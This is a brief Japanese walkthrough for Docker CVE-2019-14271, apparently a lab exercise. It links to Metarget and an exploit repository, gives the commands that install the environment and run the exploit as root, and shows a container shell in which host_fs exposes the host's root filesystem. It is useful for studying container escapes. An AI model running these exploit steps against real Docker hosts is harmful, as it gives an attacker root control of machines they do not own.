環境の構築と悪用を自動化する、便利で時間を節約できるスクリプトです。
https://github.com/Metarget/metarget
https://github.com/Metarget/metarget/tree/master/writeups_cnv/docker-cve-2019-14271
https://github.com/thomasyang1207/Exploits/tree/master/CVE_2019_14271
chmod 777 Exploit.sh
chmod 777 Install_env.sh
sudo ./Install_env.sh
sudo ./Exploit.sh
イメージがすでに構築されている場合は、再利用のため
Exploit.shのみを実行してください。
これでコンテナ cve-14271 に入り、以下のように表示されます:
root@d9b5a334a0e9:/# ls
bin breakout home lib32 logs opt run sys var
boot dev host_fs lib64 media proc sbin tmp
break_logs etc lib libx32 mnt root srv usr
host_fs に入ると、ホストのルートディレクトリがここにマウントされているのが確認でき、エスケープに成功します。ホストマシン上で root ユーザーとして操作できます。